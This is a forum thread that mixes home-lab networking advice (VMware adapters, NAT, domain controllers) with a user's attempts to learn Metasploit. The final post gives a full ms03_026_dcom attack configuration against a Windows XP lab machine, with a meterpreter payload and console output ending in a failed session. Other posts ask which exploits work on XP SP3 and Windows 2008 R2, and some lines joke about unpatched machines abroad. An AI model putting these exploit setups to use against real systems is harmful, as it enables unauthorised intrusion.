Ok 3xban if ur a metasploit expert so u can help me to find my answers.
As you said i downloaded metasploitable, first this linuz based os has GUI mode or not? second which vulnerabilites it has i mean which exploits i can run with it?

thank you so much

Thank you 3xban that was a useful website now i Updated Nmap

Then what if he wanna run an additional DC with w2k3?? he cant do that if he select windows 2008 in domain functional level. Besides if he select 2003 he can ugrade it to 2008 later


RRAS??? as i know the computer which u wanna add RRAS role must have al least 2 interfaces which connects to 2 different networks and as N_OP says he runs w2k8 on a VM. if you wanna connect that backtrack to VM lab, the W2K8 must have drect access to it so RRAS is useless in this case. Besides he can set the VM adapter to NAT With NAT the VM can connect to physical machines in the net. in this case nat adapter acts like a router no RRAS required lol.

and if u want backtrack to get IP from DHCP server the router must support BOOTp bcoz the backtrack Boc can not find DHCP from other subnets.

OK thank you both yeah i agree too in third world countries you can find many of unpatched OS, and 3xban i never say a machine is vulnerable until i get access to it even if port scanner says its vulnerable. but some of exploits in msf is not designed for old machines for example:

Windows/browser/wabdav_dll_hijacker

with this exploit u can get access to W2K8 R2 (If the admin is fool lol)

ok  liliyke if you think i meed to update that i'lltest it today.
but i dont think it works

First i think its better to run that backtrack on your Vmware bcoz maybe some of tools cant work with other subnet for example if you have a windows OS you only can use MBSA (Microsoft security baseline analyzer) in your local subnet so if u run the backtrack on VM you can use host only adapter.

second its just a Technic i have no references or i cant prove that but always when i wanna configure vmware adapters (Specially on Version 7 or 7.1) i always delete all of default adapters (First select them as host only then uncheck the connect to a host virtual adapter item) then i create new adapter in other numbers (Dont forget to disable the dhcp item too)

if you want your VM can commincate with other physical machines you must set the NAT on your card but i think other physical machine cant get IP from your dhcp server bcoz NAT is some thing like router and routers block broad cast packets

Third, before you run DC (Domain controller) create an snapshot of your vmware machine status it can be useful in failures or if you forgot ur Pass and so on after you configured your DC do it again/

forth, set ur domain functional level and forest functional level on windows 2000 as you mentioned you have that machine on your lab

no body! i know its so easy to hack but i want a msf expliot like dcom which can execute codes remotely. To hack windows xp  sp3

Yes gromic
Your Guess is absolutely true.so first if it patched in sp1-2 then why we can see windows 2003 in exploit target range?
then i wanna ask you something what is your opinion about this video serious?

WooooOOOOooooW

3xban thank i think its so great i'll purchase it so soon.

ok unicityd  so you think which SP of windows xp is vulnerable?
and which msf exploit is compatible with Windows XP SP3?

Social-Engineering is great and as CEH presentation says there is no patch for human stupidity!!!!! that was cool.

yeah the command line is great but Zenmap is easier for beginners however im useing the nmap not zenmap!

your welcome techie i hope more e so and one more thing: your avatar is so cute i like it.

Good Luck

SOOO sorry guys i typed ip address places wrongly so here is thwecorrect info:

Attacker Machine: Bactrack 5 R2 Gnome
      IP Address: 192.168.137.67
Victem's Machine: Windows XP SP 3
      IP Address: 192.168.137.165

i modified the first post too so you can check it too

i really dont know what is my problem everything seems to be ok help me pls

Hi guys, i start working in my new lab to learn metasploit completely so i used ms03_026_dcom exploit to attack to a windows xp machine but i cant get access is any body know why? here is the complete details:


ms03_026 vulnerability
=================================================
Lab setup:

Attacker Machine: Bactrack 5 R2 Gnome
      IP Address: 192.168.137.67
Victem's Machine: Windows XP SP 3
      IP Address: 192.168.137.165
=================================================
Victem's Portscan output:

PORT     STATE SERVICE
21/tcp   open  ftp
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
=================================================
Metasploit Framework 4.2

Exploit= windows/dcerpc/ms03_026_dcom
Payload= windows/meterpreter/bind_tcp

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.137.165  yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.137.165  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
=================================================
Exploitation Process output

• Started bind handler
• Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
• Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.137.165[135] ...
• Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.137.165[135] ...
• Sending exploit ...
• Exploit completed, but no session was created.

=================================================


Thankx